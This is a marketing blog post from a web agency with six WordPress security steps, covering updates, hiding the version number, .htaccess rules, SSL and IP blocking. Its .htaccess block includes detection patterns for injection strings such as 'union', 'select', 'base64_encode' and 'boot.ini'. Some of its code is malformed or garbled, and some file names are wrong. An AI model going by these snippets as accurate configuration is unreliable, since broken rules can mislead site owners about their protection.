Every day you hear about some website or celebrity Twitter account being hacked into. Associated Press recently had their Twitter account hacked into by Syrians. And the stock market fell 100 points as a result of a tweet that the White House had been bombed!
Donald Trump fell foul of prankster hackers with embarrassing consequences.
Mostly we ignore these and assume that it will happen to some big company website or Barack Obama’s Twitter account.
But, I’m here to tell you that every day your website is under attack.
The problem is, you just don’t realise it.
Think your business is too small or not significant enough to be a target? Think again.
Your website has 1 very valuable commodity that every SEO worth their salt wants – your back links.
Did you ever wonder how all those Russian and Chinese porn sites get ranked so well (assuming you’ve searched for the keywords of course, ah hum)?
Simple.
They hack into unsuspecting websites like yours and post hidden links all over the site. Unless you know where to look you’ll never find them. BUT Google does, and it will penalise your website for having them on (costing you money through lower search engine rankings and higher PPC costs) and it will destroy your online reputation.
That’s only part of the problem. For most websites are going to be built on WordPress. In fact, the MAJORITY of websites are already built on wordpress, this one included!
Don’t get me wrong we LOVE WordPress at ROARlocal, and we encourage all our clients to use it, BUT, WordPress’s own popularity has also doomed it to be the target of numerous hacking efforts over the years.
With the latest version of WordPress having been downloaded well over sixty million times, WordPress-based sites present an opportunity for cyber criminals and distributors of PC threats. An inadequately-protected WordPress site can be used to host a variety of attacks, including redirects to malicious sites and drive-by-downloads.
However, we have come up with the following ways of closing the majority of WordPress’s obvious security holes, leaving your website less-than-ripe pickings for any would-be hacker.
So how can you make sure your wordpress website is hacker proof?
Here are 6 key steps to follow:
1. Always update WordPress to its latest stable version.
While this may seem like such common sense that it scarcely bears repeating, failing to update WordPress whenever stable updates are available is a fast track to sending your blog towards a hack attack.
Old versions of WordPress have been known to allow various types of extremely invasive attacks, such as the SQL injection exploit of June 6th 2007 that allowed hackers to gain access to entire databases worth of account user names and passwords. In this case, an entire month passed before the WordPress team remedied the situation with a security patch – and one can only imagine how further delay in installing that patch could open your site up to hacking efforts.
A 2007-era study concluded that all but a mere two percent of WordPress blogs were using outdated versions of WordPress and, therefore, vulnerable to a wide range of security attacks.
2. Set WordPress to avoid displaying its version number.
This goes hand-in-hand with keeping WordPress updated. Prevent potential hackers from knowing what version of WordPress you’re using, thus making it harder to figure out which exploits will work on your site. A simple addition to the functions.php file will remove the relevant hook that displays the WordPress version:
remove_action('wp_head', 'wp_generator');
3. Set register_globals to register_globals=off.
This vulnerability is one that many WordPress users may take for granted since many sources at WordPress.org itself recommend for you to leave it on by default. However, register_globals=on has a long and sordid history of being used to hack WordPress websites, including a series of January 2007 attacks that were used to force popular blogs to redirect to malicious sites.
Such site redirects can include redirecting visitors to rogue security software or malicious domains and other types of PC threats. Such malicious sites may lead to rogue security software such as Windows Malware Firewall and Windows Antivirus Rampart. We note that the hacker responsible for the attacks in January characterized register_globals=on WordPress blogs as ‘easy targets.’
4. Use smart advertisement-management plugins to protect AdSense and other exploitable ads on your site.
While ads can be a great source of revenue, they can also be exploited by various methods – such as hacking attacks that swap out your ‘real’ AdSense ads for irrelevant pharmaceutical ads, or clickbombing attacks that overload AdSense with a flood of clicks to shut your AdSense account down.
Selectively using security plugins like ‘Who Sees Ads’ or ‘Better WP Security’ to control your ads displays and ad-related settings can help to prevent such embarrassing incidents. However, you shouldn’t install plugins willy-nilly, either – some plugins, such as AdSense Integrator, have a history of enabling the very types of attacks that they’re supposed to protect against, which will send your potential ad revenue stream straight into criminal hands.
5. Edit your .htaccess file to tighten up its security.
By default, .htaccess’s security is somewhat less air-tight than it could be, and a few selective alterations will help to keep it from being exploited for URL hacks, SQL injections and other attacks. While there are numerous tweaks you can build into .htaccess, some of the most useful ones are noted here:
order allow,
deny deny from all
These few lines will guarantee that bots and other types of unwanted access to your wp-admin.php file are barred from entry. The same method can also be applied to other important files like ‘install.php’ or ‘error_log.’
Another useful batch of code can be inserted to protect against injection-based attacks:
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK) [NC]
RewriteRule ^(.*)$ - [F,L]
RewriteCond %{QUERY_STRING} ../ [NC,OR]
RewriteCond %{QUERY_STRING} boot.ini [NC,OR]
RewriteCond %{QUERY_STRING} tag= [NC,OR]
RewriteCond %{QUERY_STRING} ftp: [NC,OR]
RewriteCond %{QUERY_STRING} http: [NC,OR]
RewriteCond %{QUERY_STRING} https: [NC,OR]
RewriteCond %{QUERY_STRING} (|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|%3D) [NC,OR]
RewriteCond %{QUERY_STRING} base64_encode.*(.*) [NC,OR]
RewriteCond %{QUERY_STRING} ^.*([|]|(|)||ê|"|;|?|*|=$).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*("|'|<|>||{||).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(%24&x).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(%0|%A|%B|%C|%D|%E|%F|127.0).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(globals|encode|localhost|loopback).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(request|select|insert|union|declare).* [NC]
RewriteCond %{HTTP_COOKIE} !^.*wordpress_logged_in_.*$
RewriteRule ^(.*)$ - [F,L]
As a cautionary footnote, always remember to back up your .htaccess file before editing it, in case your changes fail to function as intended and you need to roll back to a previous version of the file. Other types of .htaccess changes can even blacklist bots and other unwanted visitors, block image and bandwidth-stealing content scrappers and halt would-be directory browsers.
6. Use encryption if it’s available.
In scenarios where you’re concerned about personal information being intercepted during transmission, feel free to use an encryption technique like Secure Socket Layer (SSL) to protect your data. Before you do this, you should make a note of your web server and see what types of encryption are supported.
Once you’ve decided on an appropriate type of encryption, a single line in wp-admin.php will let you set the encryption on by default. For example, the following line of code will enable SSL:
define('FORCE_SSL_ADMIN', true);
As a parting note, we also encourage you to pay attention to any e-mail accounts that are associated with your WordPress site. Although hacking a WordPress blog isn’t the hardest thing in the world, a silent hacking attack that doesn’t send e-mail alerts to the relevant account is much more difficult to pull off than a ‘loud’ attack.
Paying attention to symptoms of WordPress hacks and responding as quickly as possible should always be considered paramount for WordPress security – both for your sake and the sake of your site’s visitors.
That’s a lot I know, but believe me, you do not want your website hacked, and an ounce of prevention is worth a pound of cure, or to put it bluntly:
It’s bloody expensive to fix a site that’s been hacked!
So what else can you do?
Well once you have your WordPress website hacker proof it’s time to get busy on your domain hosting. If you’re using your own server (you should be) then you can get your webmaster to sign up to the honey pot project here This will give you an up to date listing of all the major hacker IP addresses, like the ones below:
As you can see 80% of them originate in China, so it’s no surprise the US government is waging a war on Chinese hackers.
Then once you have the IPs you simply go to your WHM control panel and add the IPs to the security area to block them from being able to access your site 🙂
Simple!
If you’re using someone else’s hosting then log in to your cpanel and navigate to the security area to the IP deny section at the bottom of this image:
then once there you can add the malicious IPs to that area like this:
This is easier than you think and SUCH an important thing to do. It’s well worth either figuring it out for yourself or getting us to look after it for you.
Then if anyone tries to hack your site you’ll get an e-mail like this:
Make sure whoever is hosting your site has installed clamVX, and a word to the wise, if you’re using cheap hosting you will need to do this yourself. That’s why your hosting is cheap (you get what you pay for).
Finally get your site monitored!
I use Sucuri to monitor all our sites. They check our sites every 4 hours for malware and if they detect anything they get rid of it! VERY nice. You can check them out here.
I’ve found them the best, and believe me, an ounce of prevention is worth thousands of pounds of cure!
I am WELL aware this is a very techy post but please don’t be put off by it.
This is important.
And as I said, we’re happy to take care of this for you. Just get in touch here
Neil